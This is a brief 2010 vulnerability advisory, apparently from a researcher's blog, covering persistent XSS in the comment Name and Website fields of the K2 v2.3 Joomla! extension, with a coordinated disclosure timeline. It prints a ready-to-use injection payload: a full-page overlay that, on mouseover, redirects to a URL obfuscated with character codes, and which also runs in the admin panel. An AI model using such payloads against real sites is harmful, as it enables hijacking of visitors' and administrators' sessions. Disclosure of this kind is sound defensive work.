K2 2.3 Persistent XSS Vulnerability
Posted in Joomla!
2010-09-11 17:08:28 +0000 UTC
K2 v2.3, the popular Joomla! CCK extension, suffers from persistent XSS vulnerabilities in its comment facility.
Comment "Name" Field Persistent XSS
" style="position:absolute;top:0px;left:0px;width:99em;height:99em" onmouseover="location.href=String.fromCharCode(104,116,116,112,58,47,47,106,101,102,102,99,104, 97,110,110,101,108,108,46,99,111,109)
Comment "Website" Field Persistent XSS
" style="position:absolute;top:0px;left:0px;width:99em;height:99em" onmouseover="location.href=String.fromCharCode(104,116,116,112,58,47,47,106,101,102,102,99,104, 97,110,110,101,108,108,46,99,111,109)
NOTE: also executes in admin!
Timeline
- Vulnerabilities Discovered: 24 August 2010
- Vendor Notified: 24 August 2010
- Vendor Response: 25 August 2010
- Update Available: ... 2010
- Disclosure: 11 September 2010